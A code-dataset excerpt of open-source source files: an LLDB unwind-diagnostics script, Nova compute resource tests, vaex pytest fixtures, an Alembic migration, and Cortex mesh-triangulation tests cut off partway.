text stringlengths 4 1.02M | meta dict |
|---|---|
from __future__ import print_function
import optparse
import lldb
import re
import shlex
# Print the frame number, pc, frame pointer, module UUID and function name
# Returns the SBModule that contains the PC, if it could be found
# Print the frame number, pc, frame pointer, module UUID and function name
# Returns the SBModule that contains the PC, if it could be found
def backtrace_print_frame(target, frame_num, addr, fp):
    """Print one backtrace line for the frame at `addr`/`fp`.

    Prints the frame number, pc, frame pointer, the containing module's
    filename + UUID, and the symbol name + offset when the address can be
    symbolicated.  Returns the SBModule containing the pc, or None when the
    address could not be resolved (callers check `is not None`).
    """
    process = target.GetProcess()
    addr_for_printing = addr
    addr_width = process.GetAddressByteSize() * 2
    # For all frames but the youngest, the saved pc points *after* the call
    # instruction; back up by one byte so symbol lookup lands inside the
    # calling function rather than (possibly) the next one.
    if frame_num > 0:
        addr = addr - 1
    sbaddr = lldb.SBAddress()
    try:
        sbaddr.SetLoadAddress(addr, target)
        module_description = ""
        if sbaddr.GetModule():
            module_filename = ""
            module_uuid_str = sbaddr.GetModule().GetUUIDString()
            if module_uuid_str is None:
                module_uuid_str = ""
            if sbaddr.GetModule().GetFileSpec():
                module_filename = sbaddr.GetModule().GetFileSpec().GetFilename()
                if module_filename is None:
                    module_filename = ""
            if module_uuid_str != "" or module_filename != "":
                module_description = '%s %s' % (
                    module_filename, module_uuid_str)
    except Exception:
        # Address could not be mapped at all -- print the raw values and
        # return None (no module found).
        print('%2d: pc==0x%-*x fp==0x%-*x' % (frame_num, addr_width, addr_for_printing, addr_width, fp))
        return
    sym_ctx = target.ResolveSymbolContextForAddress(
        sbaddr, lldb.eSymbolContextEverything)
    if sym_ctx.IsValid() and sym_ctx.GetSymbol().IsValid():
        # Symbolicated: include "symbol + offset".  Note the offset is
        # computed from the decremented `addr`, not `addr_for_printing`.
        function_start = sym_ctx.GetSymbol().GetStartAddress().GetLoadAddress(target)
        offset = addr - function_start
        print('%2d: pc==0x%-*x fp==0x%-*x %s %s + %d' % (frame_num, addr_width, addr_for_printing, addr_width, fp, module_description, sym_ctx.GetSymbol().GetName(), offset))
    else:
        print('%2d: pc==0x%-*x fp==0x%-*x %s' % (frame_num, addr_width, addr_for_printing, addr_width, fp, module_description))
    return sbaddr.GetModule()
# A simple stack walk algorithm that follows the frame chain.
# Returns a two-element list; the first element is a list of modules
# seen and the second element is a list of addresses seen during the backtrace.
# A simple stack walk algorithm that follows the frame chain.
# Returns a two-element list; the first element is a list of modules
# seen and the second element is a list of addresses seen during the backtrace.
def simple_backtrace(debugger):
    """Walk the stack by following the fp/pc frame chain directly.

    This is independent of lldb's own unwinder, so its output can be compared
    against lldb's backtrace to diagnose unwind problems.  Returns
    [module_list, address_list].
    """
    target = debugger.GetSelectedTarget()
    process = target.GetProcess()
    cur_thread = process.GetSelectedThread()
    initial_fp = cur_thread.GetFrameAtIndex(0).GetFP()
    # If the pseudoreg "fp" isn't recognized, on arm hardcode to r7 which is
    # correct for Darwin programs.
    if initial_fp == lldb.LLDB_INVALID_ADDRESS and target.triple[0:3] == "arm":
        for reggroup in cur_thread.GetFrameAtIndex(1).registers:
            if reggroup.GetName() == "General Purpose Registers":
                for reg in reggroup:
                    if reg.GetName() == "r7":
                        initial_fp = int(reg.GetValue(), 16)
    module_list = []
    address_list = [cur_thread.GetFrameAtIndex(0).GetPC()]
    # Frame 0 comes straight from the live registers.
    this_module = backtrace_print_frame(
        target, 0, cur_thread.GetFrameAtIndex(0).GetPC(), initial_fp)
    print_stack_frame(process, initial_fp)
    print("")
    if this_module is not None:
        module_list.append(this_module)
    if cur_thread.GetNumFrames() < 2:
        return [module_list, address_list]
    # Frame layout assumed here (Darwin-style): *fp == saved fp,
    # *(fp + wordsize) == saved pc.  Read errors are ignored for this first
    # step (a fresh SBError is passed and never checked).
    cur_fp = process.ReadPointerFromMemory(initial_fp, lldb.SBError())
    cur_pc = process.ReadPointerFromMemory(
        initial_fp + process.GetAddressByteSize(), lldb.SBError())
    frame_num = 1
    while cur_pc != 0 and cur_fp != 0 and cur_pc != lldb.LLDB_INVALID_ADDRESS and cur_fp != lldb.LLDB_INVALID_ADDRESS:
        address_list.append(cur_pc)
        this_module = backtrace_print_frame(target, frame_num, cur_pc, cur_fp)
        print_stack_frame(process, cur_fp)
        print("")
        if this_module is not None:
            module_list.append(this_module)
        frame_num = frame_num + 1
        next_pc = 0
        next_fp = 0
        # Only architectures with this frame-chain layout are walked; anything
        # else leaves next_pc/next_fp at 0 and terminates the loop.
        if target.triple[
                0:6] == "x86_64" or target.triple[
                0:4] == "i386" or target.triple[
                0:3] == "arm":
            error = lldb.SBError()
            next_pc = process.ReadPointerFromMemory(
                cur_fp + process.GetAddressByteSize(), error)
            if not error.Success():
                next_pc = 0
            next_fp = process.ReadPointerFromMemory(cur_fp, error)
            if not error.Success():
                next_fp = 0
            # Clear the 0th bit for arm frames - this indicates it is a thumb frame
            if target.triple[0:3] == "arm" and (next_pc & 1) == 1:
                next_pc = next_pc & ~1
        cur_pc = next_pc
        cur_fp = next_fp
    # Print the terminating (invalid) frame values as well.
    this_module = backtrace_print_frame(target, frame_num, cur_pc, cur_fp)
    print_stack_frame(process, cur_fp)
    print("")
    if this_module is not None:
        module_list.append(this_module)
    return [module_list, address_list]
def print_stack_frame(process, fp):
    """Dump the five pointer-sized words starting at $fp - 2*wordsize.

    Silently does nothing when fp is obviously bogus (0, 1, or the invalid
    address sentinel) or when reading memory raises.
    """
    if fp in (0, 1) or fp == lldb.LLDB_INVALID_ADDRESS:
        return
    word_size = process.GetAddressByteSize()
    base = fp - (2 * word_size)
    parts = ["Stack frame from $fp-%d: " % (2 * word_size)]
    err = lldb.SBError()
    try:
        slot = 0
        # Stop early if a memory read fails.
        while slot < 5 and err.Success():
            value = process.ReadPointerFromMemory(
                base + (slot * word_size), err)
            parts.append(" 0x%x" % value)
            slot += 1
        print("".join(parts))
    except Exception:
        return
def diagnose_unwind(debugger, command, result, dict):
    """
    Gather diagnostic information to help debug incorrect unwind (backtrace)
    behavior in lldb. When there is a backtrace that doesn't look
    correct, run this command with the correct thread selected and a
    large amount of diagnostic information will be printed, it is likely
    to be helpful when reporting the problem.
    """
    command_args = shlex.split(command)
    parser = create_diagnose_unwind_options()
    try:
        (options, args) = parser.parse_args(command_args)
    except:
        # optparse raises SystemExit on bad input; bail out quietly.
        return
    target = debugger.GetSelectedTarget()
    if not target:
        return
    process = target.GetProcess()
    if not process:
        return
    thread = process.GetSelectedThread()
    if not thread:
        return

    # Parse major/minor out of a version string like "lldb-350.0.21".
    # Bug fixes: the original initialized `lldb_version` but assigned
    # `lldb_major`, and raised AttributeError when the regex did not match.
    lldb_versions_match = re.search(
        r'[lL][lL][dD][bB]-(\d+)([.](\d+))?([.](\d+))?',
        debugger.GetVersionString())
    lldb_major = 0
    lldb_minor = 0
    if lldb_versions_match:
        groups = lldb_versions_match.groups()
        if len(groups) >= 1 and groups[0]:
            lldb_major = int(groups[0])
        if len(groups) >= 5 and groups[4]:
            lldb_minor = int(groups[4])

    modules_seen = []
    addresses_seen = []
    print('LLDB version %s' % debugger.GetVersionString())
    print('Unwind diagnostics for thread %d' % thread.GetIndexID())
    print("")
    print("=============================================================================================")
    print("")
    print("OS plugin setting:")
    debugger.HandleCommand(
        "settings show target.process.python-os-plugin-path")
    print("")
    print("Live register context:")
    thread.SetSelectedFrame(0)
    debugger.HandleCommand("register read")
    print("")
    print("=============================================================================================")
    print("")
    print("lldb's unwind algorithm:")
    print("")
    # Record every non-inlined frame lldb's own unwinder produced.
    frame_num = 0
    for frame in thread.frames:
        if not frame.IsInlined():
            this_module = backtrace_print_frame(
                target, frame_num, frame.GetPC(), frame.GetFP())
            print_stack_frame(process, frame.GetFP())
            print("")
            if this_module is not None:
                modules_seen.append(this_module)
            addresses_seen.append(frame.GetPC())
            frame_num = frame_num + 1
    print("")
    print("=============================================================================================")
    print("")
    print("Simple stack walk algorithm:")
    print("")
    # Merge in whatever the naive frame-chain walk saw.
    (module_list, address_list) = simple_backtrace(debugger)
    if module_list:
        modules_seen += module_list
    if address_list:
        addresses_seen = set(addresses_seen)
        addresses_seen.update(set(address_list))
    print("")
    print("=============================================================================================")
    print("")
    print("Modules seen in stack walks:")
    print("")
    modules_already_seen = set()
    for module in modules_seen:
        if module is not None and module.GetFileSpec().GetFilename() is not None:
            if not module.GetFileSpec().GetFilename() in modules_already_seen:
                debugger.HandleCommand(
                    'image list %s' %
                    module.GetFileSpec().GetFilename())
                modules_already_seen.add(
                    module.GetFileSpec().GetFilename())
    print("")
    print("=============================================================================================")
    print("")
    print("Disassembly of addresses seen in stack walks:")
    print("")
    # Bug fix: take an independent copy.  The original aliased
    # `addresses_seen` from BOTH this variable and
    # `additional_addresses_to_show_unwind` below, so addresses removed while
    # disassembling were also (incorrectly) dropped from the show-unwind
    # report.
    additional_addresses_to_disassemble = set(addresses_seen)
    for frame in thread.frames:
        if not frame.IsInlined():
            print("--------------------------------------------------------------------------------------")
            print("")
            print("Disassembly of %s, frame %d, address 0x%x" % (frame.GetFunctionName(), frame.GetFrameID(), frame.GetPC()))
            print("")
            # AT&T syntax for Intel targets, default syntax elsewhere.
            if target.triple[
                    0:6] == "x86_64" or target.triple[
                    0:4] == "i386":
                debugger.HandleCommand(
                    'disassemble -F att -a 0x%x' % frame.GetPC())
            else:
                debugger.HandleCommand(
                    'disassemble -a 0x%x' %
                    frame.GetPC())
            if frame.GetPC() in additional_addresses_to_disassemble:
                additional_addresses_to_disassemble.remove(
                    frame.GetPC())
    # Disassemble addresses the simple walk saw that lldb's unwinder did not.
    for address in list(additional_addresses_to_disassemble):
        print("--------------------------------------------------------------------------------------")
        print("")
        print("Disassembly of 0x%x" % address)
        print("")
        if target.triple[
                0:6] == "x86_64" or target.triple[
                0:4] == "i386":
            debugger.HandleCommand(
                'disassemble -F att -a 0x%x' % address)
        else:
            debugger.HandleCommand('disassemble -a 0x%x' % address)
    print("")
    print("=============================================================================================")
    print("")
    # Independent copy for the same reason as above.
    additional_addresses_to_show_unwind = set(addresses_seen)
    for frame in thread.frames:
        if not frame.IsInlined():
            print("--------------------------------------------------------------------------------------")
            print("")
            print("Unwind instructions for %s, frame %d" % (frame.GetFunctionName(), frame.GetFrameID()))
            print("")
            debugger.HandleCommand(
                'image show-unwind -a "0x%x"' % frame.GetPC())
            if frame.GetPC() in additional_addresses_to_show_unwind:
                additional_addresses_to_show_unwind.remove(
                    frame.GetPC())
    for address in list(additional_addresses_to_show_unwind):
        print("--------------------------------------------------------------------------------------")
        print("")
        print("Unwind instructions for 0x%x" % address)
        print("")
        debugger.HandleCommand(
            'image show-unwind -a "0x%x"' % address)
def create_diagnose_unwind_options():
usage = "usage: %prog"
description = '''Print diagnostic information about a thread backtrace which will help to debug unwind problems'''
parser = optparse.OptionParser(
description=description,
prog='diagnose_unwind',
usage=usage)
return parser
# Module entry point: when loaded via `command script import`, register the
# diagnose_unwind function above as the "diagnose-unwind" lldb command.
lldb.debugger.HandleCommand(
    'command script add -f %s.diagnose_unwind diagnose-unwind' %
    __name__)
print('The "diagnose-unwind" command has been installed, type "help diagnose-unwind" for detailed help.')
| {
"content_hash": "40edba7b48804d5069fa2b760269b5cb",
"timestamp": "",
"source": "github",
"line_count": 307,
"max_line_length": 174,
"avg_line_length": 44.86644951140065,
"alnum_prop": 0.48874691447655,
"repo_name": "endlessm/chromium-browser",
"id": "db3ff1952f33585bacade73ce9e0c9a2eaebde39",
"size": "14133",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "third_party/llvm/lldb/examples/python/diagnose_unwind.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""Tests for the compute extra resources framework."""
from oslo.config import cfg
from stevedore import extension
from stevedore import named
from nova.compute import resources
from nova.compute.resources import base
from nova.compute.resources import vcpu
from nova import context
from nova.objects import flavor as flavor_obj
from nova import test
from nova.tests.unit import fake_instance
CONF = cfg.CONF
class FakeResourceHandler(resources.ResourceHandler):
    """ResourceHandler whose extension manager is seeded directly with
    pre-built extensions rather than loaded from entry points.
    """

    def __init__(self, extensions):
        mgr = named.NamedExtensionManager.make_test_instance(extensions)
        self._mgr = mgr
class FakeResource(base.Resource):
    """Minimal Resource implementation backed by two plain counters.

    Subclasses set ``self.resource_name`` in reset(); requested amounts are
    read from a flavor's ``extra_specs`` under that key.
    """

    def __init__(self):
        self.total_res = 0
        self.used_res = 0

    def _get_requested(self, usage):
        # Amount requested via extra_specs, or None when not requested.
        if 'extra_specs' not in usage:
            return None
        specs = usage['extra_specs']
        if self.resource_name not in specs:
            return None
        return int(specs[self.resource_name])

    def _get_limit(self, limits):
        # Limit for this resource, or None when unlimited.
        if self.resource_name in limits:
            return int(limits[self.resource_name])
        return None

    def reset(self, resources, driver):
        self.total_res = 0
        self.used_res = 0

    def test(self, usage, limits):
        """Return None on success, or a human-readable failure reason."""
        requested = self._get_requested(usage)
        if not requested:
            return None
        limit = self._get_limit(limits)
        if not limit:
            # No limit set means the request always passes.
            return None
        free = limit - self.used_res
        if requested > free:
            return ('Free %(free)d < requested %(requested)d ' %
                    {'free': free, 'requested': requested})
        return None

    def add_instance(self, usage):
        requested = self._get_requested(usage)
        if requested:
            self.used_res += requested

    def remove_instance(self, usage):
        requested = self._get_requested(usage)
        if requested:
            self.used_res -= requested

    def write(self, resources):
        pass

    def report_free(self):
        free = self.total_res - self.used_res
        return "Free %s" % free
class ResourceA(FakeResource):
    """Fake resource whose capacity comes from the CONF.resA option."""

    def reset(self, resources, driver):
        # ResourceA uses a configuration option
        self.resource_name = 'resource:resA'
        self.total_res = int(CONF.resA)
        self.used_res = 0

    def write(self, resources):
        resources['resA'] = self.total_res
        resources['used_resA'] = self.used_res
class ResourceB(FakeResource):
    """Fake resource whose capacity is supplied by the driver."""

    def reset(self, resources, driver):
        # ResourceB uses resource details passed in parameter resources
        self.resource_name = 'resource:resB'
        self.total_res = resources['resB']
        self.used_res = 0

    def write(self, resources):
        resources['resB'] = self.total_res
        resources['used_resB'] = self.used_res
def fake_flavor_obj(**updates):
    """Return a Flavor object populated with fixed test values.

    Any keyword arguments override the defaults via Flavor.update().
    """
    flavor = flavor_obj.Flavor()
    base_values = (
        ('id', 1),
        ('name', 'fakeflavor'),
        ('memory_mb', 8000),
        ('vcpus', 3),
        ('root_gb', 11),
        ('ephemeral_gb', 4),
        ('swap', 0),
        ('rxtx_factor', 1.0),
        ('vcpu_weight', 1),
    )
    for attr, value in base_values:
        setattr(flavor, attr, value)
    if updates:
        flavor.update(updates)
    return flavor
class BaseTestCase(test.TestCase):
    """Tests for the ResourceHandler driven by the fake resources above."""

    def _initialize_used_res_counter(self):
        # Initialize the value for the used resource
        for ext in self.r_handler._mgr.extensions:
            ext.obj.used_res = 0

    def setUp(self):
        super(BaseTestCase, self).setUp()
        # initialize flavors and stub get_by_id to
        # get flavors from here
        self._flavors = {}
        self.ctxt = context.get_admin_context()

        # Create a flavor without extra_specs defined
        _flavor_id = 1
        _flavor = fake_flavor_obj(id=_flavor_id)
        self._flavors[_flavor_id] = _flavor

        # Create a flavor with extra_specs defined
        _flavor_id = 2
        requested_resA = 5
        requested_resB = 7
        requested_resC = 7  # resC has no matching extension; it is ignored
        _extra_specs = {'resource:resA': requested_resA,
                        'resource:resB': requested_resB,
                        'resource:resC': requested_resC}
        _flavor = fake_flavor_obj(id=_flavor_id,
                                  extra_specs=_extra_specs)
        self._flavors[_flavor_id] = _flavor

        # create fake resource extensions and resource handler
        _extensions = [
            extension.Extension('resA', None, ResourceA, ResourceA()),
            extension.Extension('resB', None, ResourceB, ResourceB()),
        ]
        self.r_handler = FakeResourceHandler(_extensions)

        # Resources details can be passed to each plugin or can be specified as
        # configuration options
        driver_resources = {'resB': 5}
        CONF.resA = '10'

        # initialise the resources
        self.r_handler.reset_resources(driver_resources, None)

    def test_update_from_instance_with_extra_specs(self):
        # Flavor with extra_specs
        _flavor_id = 2
        sign = 1
        self.r_handler.update_from_instance(self._flavors[_flavor_id], sign)

        # Usage counters should reflect exactly what the flavor requested.
        expected_resA = self._flavors[_flavor_id].extra_specs['resource:resA']
        expected_resB = self._flavors[_flavor_id].extra_specs['resource:resB']
        self.assertEqual(int(expected_resA),
                         self.r_handler._mgr['resA'].obj.used_res)
        self.assertEqual(int(expected_resB),
                         self.r_handler._mgr['resB'].obj.used_res)

    def test_update_from_instance_without_extra_specs(self):
        # Flavor id without extra spec
        _flavor_id = 1
        self._initialize_used_res_counter()
        self.r_handler.resource_list = []
        sign = 1
        self.r_handler.update_from_instance(self._flavors[_flavor_id], sign)
        # Nothing requested, so nothing should be accounted as used.
        self.assertEqual(0, self.r_handler._mgr['resA'].obj.used_res)
        self.assertEqual(0, self.r_handler._mgr['resB'].obj.used_res)

    def test_write_resources(self):
        self._initialize_used_res_counter()
        extra_resources = {}
        expected = {'resA': 10, 'used_resA': 0, 'resB': 5, 'used_resB': 0}
        self.r_handler.write_resources(extra_resources)
        self.assertEqual(expected, extra_resources)

    def test_test_resources_without_extra_specs(self):
        limits = {}
        # Flavor id without extra_specs
        flavor = self._flavors[1]
        result = self.r_handler.test_resources(flavor, limits)
        # One None per extension means "no objection".
        self.assertEqual([None, None], result)

    def test_test_resources_with_limits_for_different_resource(self):
        # A limit for resC only; resA/resB remain unlimited and pass.
        limits = {'resource:resC': 20}
        # Flavor id with extra_specs
        flavor = self._flavors[2]
        result = self.r_handler.test_resources(flavor, limits)
        self.assertEqual([None, None], result)

    def test_passing_test_resources(self):
        limits = {'resource:resA': 10, 'resource:resB': 20}
        # Flavor id with extra_specs
        flavor = self._flavors[2]
        self._initialize_used_res_counter()
        result = self.r_handler.test_resources(flavor, limits)
        self.assertEqual([None, None], result)

    def test_failing_test_resources_for_single_resource(self):
        # resA requests 5 but only 4 are allowed -> one failure message.
        limits = {'resource:resA': 4, 'resource:resB': 20}
        # Flavor id with extra_specs
        flavor = self._flavors[2]
        self._initialize_used_res_counter()
        result = self.r_handler.test_resources(flavor, limits)
        expected = ['Free 4 < requested 5 ', None]
        # Sorted comparison because extension ordering is not guaranteed.
        self.assertEqual(sorted(expected),
                         sorted(result))

    def test_empty_resource_handler(self):
        """An empty resource handler has no resource extensions,
        should have no effect, and should raise no exceptions.
        """
        empty_r_handler = FakeResourceHandler([])

        resources = {}
        empty_r_handler.reset_resources(resources, None)

        flavor = self._flavors[1]
        sign = 1
        empty_r_handler.update_from_instance(flavor, sign)

        limits = {}
        test_result = empty_r_handler.test_resources(flavor, limits)
        self.assertEqual([], test_result)

        sign = -1
        empty_r_handler.update_from_instance(flavor, sign)

        extra_resources = {}
        expected_extra_resources = extra_resources
        empty_r_handler.write_resources(extra_resources)
        self.assertEqual(expected_extra_resources, extra_resources)

        empty_r_handler.report_free_resources()

    def test_vcpu_resource_load(self):
        # load the vcpu example
        names = ['vcpu']
        real_r_handler = resources.ResourceHandler(names)
        ext_names = real_r_handler._mgr.names()
        self.assertEqual(names, ext_names)

        # check the extension loaded is the one we expect
        # and an instance of the object has been created
        ext = real_r_handler._mgr['vcpu']
        self.assertIsInstance(ext.obj, vcpu.VCPU)
class TestVCPU(test.TestCase):
    """Direct tests of the example VCPU resource plugin."""

    def setUp(self):
        super(TestVCPU, self).setUp()
        self._vcpu = vcpu.VCPU()
        # Seed internal counters directly: 10 total, 0 used.
        self._vcpu._total = 10
        self._vcpu._used = 0
        self._flavor = fake_flavor_obj(vcpus=5)
        self._big_flavor = fake_flavor_obj(vcpus=20)
        self._instance = fake_instance.fake_instance_obj(None)

    def test_reset(self):
        # set vcpu values to something different to test reset
        self._vcpu._total = 10
        self._vcpu._used = 5
        driver_resources = {'vcpus': 20}
        self._vcpu.reset(driver_resources, None)
        # reset adopts the driver's total and zeroes the usage counter.
        self.assertEqual(20, self._vcpu._total)
        self.assertEqual(0, self._vcpu._used)

    def test_add_and_remove_instance(self):
        self._vcpu.add_instance(self._flavor)
        self.assertEqual(10, self._vcpu._total)
        self.assertEqual(5, self._vcpu._used)
        self._vcpu.remove_instance(self._flavor)
        self.assertEqual(10, self._vcpu._total)
        self.assertEqual(0, self._vcpu._used)

    def test_test_pass_limited(self):
        result = self._vcpu.test(self._flavor, {'vcpu': 10})
        self.assertIsNone(result, 'vcpu test failed when it should pass')

    def test_test_pass_unlimited(self):
        # No limit entry at all means any request passes.
        result = self._vcpu.test(self._big_flavor, {})
        self.assertIsNone(result, 'vcpu test failed when it should pass')

    def test_test_fail(self):
        result = self._vcpu.test(self._flavor, {'vcpu': 2})
        expected = 'Free CPUs 2.00 VCPUs < requested 5 VCPUs'
        self.assertEqual(expected, result)

    def test_write(self):
        resources = {'stats': {}}
        self._vcpu.write(resources)
        expected = {
            'vcpus': 10,
            'vcpus_used': 0,
            'stats': {
                'num_vcpus': 10,
                'num_vcpus_used': 0
            }
        }
        # NOTE(review): sorted() over a dict yields its sorted *keys*, so
        # this only compares key sets, not values or the nested 'stats'
        # contents — presumably assertEqual(expected, resources) was
        # intended; confirm before tightening.
        self.assertEqual(sorted(expected),
                         sorted(resources))
| {
"content_hash": "a02da68f6bf7b87708e6f73c1ac7a8e2",
"timestamp": "",
"source": "github",
"line_count": 328,
"max_line_length": 79,
"avg_line_length": 32.85670731707317,
"alnum_prop": 0.6061983854504964,
"repo_name": "mgagne/nova",
"id": "bf3d6349833a4d6da144176a750d28587946b9dd",
"size": "11438",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nova/tests/unit/compute/test_resources.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "15421976"
},
{
"name": "Shell",
"bytes": "21612"
}
],
"symlink_target": ""
} |
import pytest
import asyncio
import vaex.jupyter.utils
vaex.jupyter.utils._test_delay = 0.01
@pytest.fixture()
def flush_guard():
    """Fail the test if debounced callbacks are leaked before or after it.

    The post-yield assert fires when the test finished without flushing the
    vaex.jupyter debounced-execute queue.
    """
    assert not vaex.jupyter.utils._debounced_execute_queue, "oops, stuff was left in the queue"
    yield
    assert not vaex.jupyter.utils._debounced_execute_queue, "oops, stuff was left in the queue, please call flush before ending the test"
# as in https://github.com/erdewit/nest_asyncio/issues/20
@pytest.fixture(scope="session")
def event_loop():
    """Don't close event loop at the end of every function decorated by
    @pytest.mark.asyncio

    Session-scoped so all async tests share one loop, which is closed once
    at the end of the session.
    """
    # Cleanup: removed a leftover debug print ("CREATE" * 10), a redundant
    # function-local `import asyncio` (already imported at module level) and
    # commented-out dead code.
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    yield loop
    loop.close()
@pytest.fixture()
def server_latency(webserver):
    """Add 0.1s of artificial latency to the test webserver for one test."""
    try:
        webserver._test_latency = 0.1
        yield
    finally:
        # Always restore, even when the test fails.
        webserver._test_latency = None
| {
"content_hash": "dfa6d039465190f56f81603fdb07496d",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 137,
"avg_line_length": 26.513513513513512,
"alnum_prop": 0.6880733944954128,
"repo_name": "maartenbreddels/vaex",
"id": "9a2357bbd2f15e5e36cd6c687bee96e29e99fbfd",
"size": "981",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/jupyter/conftest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1888"
},
{
"name": "C++",
"bytes": "81166"
},
{
"name": "CSS",
"bytes": "6604"
},
{
"name": "GLSL",
"bytes": "6204"
},
{
"name": "HTML",
"bytes": "177613"
},
{
"name": "JavaScript",
"bytes": "1489136"
},
{
"name": "Makefile",
"bytes": "432"
},
{
"name": "PHP",
"bytes": "33807"
},
{
"name": "Python",
"bytes": "1893232"
},
{
"name": "Shell",
"bytes": "4639"
}
],
"symlink_target": ""
} |
from alembic import op
import sqlalchemy as sa
"""Add Port Profile delete table for UCSM plugin
Revision ID: 203b495958cf
Revises: b29f1026b281
Create Date: 2017-01-03 16:25:03.426346
"""
# revision identifiers, used by Alembic.
revision = '203b495958cf'
down_revision = 'b29f1026b281'
def upgrade():
    """Create the table recording UCSM port profiles pending deletion."""
    table_name = 'ml2_ucsm_delete_port_profiles'
    columns = [
        sa.Column('profile_id', sa.String(length=64), nullable=False),
        sa.Column('device_id', sa.String(length=64), nullable=False),
        # A profile may exist on several devices; the pair is the key.
        sa.PrimaryKeyConstraint('profile_id', 'device_id'),
    ]
    op.create_table(table_name, *columns)
| {
"content_hash": "bc9ef8417e253b8623d9906c4d960266",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 70,
"avg_line_length": 24.652173913043477,
"alnum_prop": 0.708994708994709,
"repo_name": "noironetworks/networking-cisco",
"id": "f9e1f2f7d97034b90133205e7fb16068d41f4812",
"size": "1179",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "networking_cisco/db/migration/alembic_migrations/versions/mitaka/expand/203b495958cf_add_port_profile_delete_table_for_ucsm_.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "1043"
},
{
"name": "Python",
"bytes": "3635799"
},
{
"name": "Shell",
"bytes": "30511"
}
],
"symlink_target": ""
} |
import os
import math
import unittest
import IECore
import IECoreScene
import imath
class TestTriangulateOp( unittest.TestCase ) :
    """Tests for IECoreScene.TriangulateOp (NOTE: Python 2 file -- it uses
    print statements and the deprecated assert_ alias)."""

    def testSimple( self ) :
        """ Test TriangulateOp with a single polygon"""

        # Build a single quad mesh in the XZ plane.
        verticesPerFace = IECore.IntVectorData()
        verticesPerFace.append( 4 )

        vertexIds = IECore.IntVectorData()
        vertexIds.append( 0 )
        vertexIds.append( 1 )
        vertexIds.append( 2 )
        vertexIds.append( 3 )

        P = IECore.V3fVectorData()
        P.append( imath.V3f( -1, 0, -1 ) )
        P.append( imath.V3f( -1, 0, 1 ) )
        P.append( imath.V3f( 1, 0, 1 ) )
        P.append( imath.V3f( 1, 0, -1 ) )

        m = IECoreScene.MeshPrimitive( verticesPerFace, vertexIds )
        m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, P )

        # One face-varying value per face-vertex.
        fv = IECore.IntVectorData()
        fv.append( 5 )
        fv.append( 6 )
        fv.append( 7 )
        fv.append( 8 )
        m["fv"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.FaceVarying, fv )

        # One uniform value for the single face.
        u = IECore.FloatVectorData()
        u.append( 1.0 )
        m["u"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, u )

        op = IECoreScene.TriangulateOp()

        result = op(
            input = m
        )

        self.assert_( "P" in result )

        self.assert_( result.arePrimitiveVariablesValid() )

        # Triangulation must not move or add points...
        resultP = result["P"].data

        self.assertEqual( len(resultP), 4 )
        for i in range(0, 4) :
            self.assert_( ( resultP[i] - P[i] ).length() < 0.001 )

        # ...but the quad becomes two triangles (6 vertex ids, all faces 3-sided).
        self.assertEqual( len(result.vertexIds), 6 )

        for faceVertexCount in result.verticesPerFace :
            self.assertEqual( faceVertexCount, 3 )

        for vId in result.vertexIds:
            self.assert_( vId < len(resultP) )

        # Face-varying data is redistributed to match the new vertex ids.
        self.assert_( "fv" in result )
        fv = result["fv"]
        self.assertEqual( len(fv.data), len(result.vertexIds) )

        for i in fv.data:
            self.assert_( i >= 5 and i <= 8 )

    def testQuadrangulatedSphere( self ) :
        """ Test TriangulateOp with a quadrangulated poly sphere"""

        m = IECore.Reader.create( "test/IECore/data/cobFiles/polySphereQuads.cob").read()

        P = m["P"].data

        self.assertEqual ( len( m.vertexIds ), 1560 )

        op = IECoreScene.TriangulateOp()

        result = op(
            input = m
        )

        self.assert_( result.arePrimitiveVariablesValid() )

        self.assert_( "P" in result )

        # Point positions are preserved exactly (within tolerance).
        resultP = result["P"].data

        self.assertEqual( len( resultP ), len( P ) )
        for i in range(0, len( resultP ) ) :
            self.assert_( ( resultP[i] - P[i] ).length() < 0.001 )

        for faceVertexCount in result.verticesPerFace :
            self.assertEqual( faceVertexCount, 3 )

        for vId in result.vertexIds:
            self.assert_( vId < len(resultP) )

        # Each quad splits into two triangles: 1560 ids -> 2280 ids.
        self.assertEqual ( len( result.vertexIds ), 2280 )

    def testTriangulatedSphere( self ) :
        """ Test TriangulateOp with a triangulated poly sphere"""

        m = IECore.Reader.create( "test/IECore/data/cobFiles/pSphereShape1.cob").read()

        op = IECoreScene.TriangulateOp()

        result = op(
            input = m
        )

        self.assert_( result.arePrimitiveVariablesValid() )

        # As input was already triangulated, the result should be exactly the same
        self.assertEqual( m, result )

    def testNonPlanar( self ) :
        """ Test TriangulateOp with a nonplanar polygon"""

        verticesPerFace = IECore.IntVectorData()
        verticesPerFace.append( 4 )

        vertexIds = IECore.IntVectorData()
        vertexIds.append( 0 )
        vertexIds.append( 1 )
        vertexIds.append( 2 )
        vertexIds.append( 3 )

        P = IECore.V3dVectorData()
        P.append( imath.V3d( -1, 0, -1 ) )
        P.append( imath.V3d( -1, 0, 1 ) )
        P.append( imath.V3d( 1, 0, 1 ) )
        # Last point lifted out of the plane of the first three.
        P.append( imath.V3d( 1, 1, -1 ) )

        m = IECoreScene.MeshPrimitive( verticesPerFace, vertexIds )
        m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, P )

        op = IECoreScene.TriangulateOp()

        op["input"] = m

        # Non-planar faces not supported by default
        self.assertRaises( RuntimeError, op )

        # With throwExceptions off the op runs without raising.
        op["throwExceptions"] = False
        result = op()

    def testConcave( self ) :
        """ Test TriangulateOp with a concave polygon"""

        verticesPerFace = IECore.IntVectorData()
        verticesPerFace.append( 4 )

        vertexIds = IECore.IntVectorData()
        vertexIds.append( 0 )
